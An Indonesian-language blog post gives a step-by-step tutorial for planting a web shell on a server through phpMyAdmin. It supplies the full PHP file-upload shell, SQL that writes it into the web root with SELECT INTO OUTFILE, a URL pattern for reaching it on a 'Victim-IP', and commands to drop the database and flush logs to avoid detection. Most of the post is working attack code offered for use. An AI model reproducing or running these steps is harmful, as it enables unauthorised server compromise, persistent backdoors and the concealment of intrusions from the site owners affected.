Cara Tanam Backdoor di phpMyAdmin

Thama Blog - Untuk episode kali ini saya akan membahas,cara menanam shell di PhpMyadmin
nah,sebelumnya saya hanya menyarankan untuk tidak hanya bisa copy paste dari kode saya ini..
karna sebelumnya saya juga mencari materi inject PhpMyadmin,dan sayangnya pada saat itu saya hanya mencopy code yang diberikannya saja.

Ok langsung saja
Sarat buat inject PhpMyadmin :
- Punya Browser
- Sudah Bisa Login Ke PhpMyadmin
- Mengerti menggunakan PhpMyadmin
- Tau makna Create - Update - Delte dalam PhpMyadmin (CRUD)

Pertama :
Mari kita masuk ke PhpMyadmin,Kemudian kita buat sebuah table dengan metode menggunakan Run SQL query
Perintah pertama,mari kita buat database dengan nama "tanam" (tanpa tanda petik) dengan perintah

CREATE DATABASE tanam

Kedua :
Masuk kedalam database tanam yang telah dibuat tadi
dan pilih kembali Run SQL query kemudian buat table "shell" dan column "bajak"(tanpa tanda petik) dengan dengan perintah

create table `tanam`.`shell`(bajak text);

Ketiga :
Kemudian kembali masuk ke dalam Run SQL query dan saatnya menanam shell :p
tanam shell dengan perintah

INSERT INTO `tanam`.`shell` (`bajak`) VALUES ('<title>MASDA29D</title><form action="" method="post" enctype="multipart/form-data"><input type="file" name="m_upload"><input type="submit" name="upload" value="-=(x)=-"></form><?php error_reporting(0);?><?php $post=$_POST["upload"];if(isset($_POST["upload"]))$target_file = basename($_FILES["m_upload"]["name"]);{if(move_uploaded_file($_FILES["m_upload"]["tmp_name"], $target_file)){echo "Shell Udah Masuk Bos!!";}else{echo "Masukkan Shell Kamu Bos!!";}}?>


Keempat :
Nah untuk bisa mengetahui dimana path/basedir (base directory) kembali masuk ke Run SQL query dengan mengetikkan perintah

SHOW VARIABLES

Kelima :

Setelah kita mengetahui letak basedir nya maka kita masuk kembali ke Run SQL query dan saatnya kita membuat output file

dari shell yang udah kita masukkan tadi dengan perintah

SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' from shell;

Kemudian kamu bisa meng'excute codenya dengan perintah
http://Victim-IP/cmd.php?cmd=

Untuk lebih aman,biar gak ketahuan kamu bisa masuk kembali ke Run SQL query dan mengetikkan perintah
(gunanya untuk menghapus database yang udah dibuat tadi dan menghapus lognya :) )

DROP DATABASE tanam;
FLUSH LOGS;


========================================================================
Php Upload Shell :
========================================================================
<title>MASDA29D</title><form action="" method="post" enctype="multipart/form-data"><input type="file" name="m_upload"><input type="submit" name="upload" value="-=(x)=-"></form><?php error_reporting(0);?><?php $post=$_POST["upload"];if(isset($_POST["upload"]))$target_file = basename($_FILES["m_upload"]["name"]);{if(move_uploaded_file($_FILES["m_upload"]["tmp_name"], $target_file)){echo "Shell Udah Masuk Bos!!";}else{echo "Masukkan Shell Kamu Bos!!";}}?>
------------------------------------------------------------------------------------------------------------



========================================================================
Full Source Code :
========================================================================
CREATE DATABASE tanam;
CREATE TABLE `tanam`.`shell`(masda text);
INSERT INTO `tanam`.`shell` (`masda`) VALUES ('<title>MASDA29D</title><form action="" method="post" enctype="multipart/form-data"><input type="file" name="m_upload"><input type="submit" name="upload" value="-=(x)=-"></form><?php error_reporting(0);?><?php $post=$_POST["upload"];if(isset($_POST["upload"]))$target_file = basename($_FILES["m_upload"]["name"]);{if(move_uploaded_file($_FILES["m_upload"]["tmp_name"], $target_file)){echo "Shell Udah Masuk Bos!!";}else{echo "Masukkan Shell Kamu Bos!!";}}?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/cmd.php' FROM `tanam`.`shell`;
DROP DATABASE tanam;
FLUSH LOGS;
========================================================================

Share this post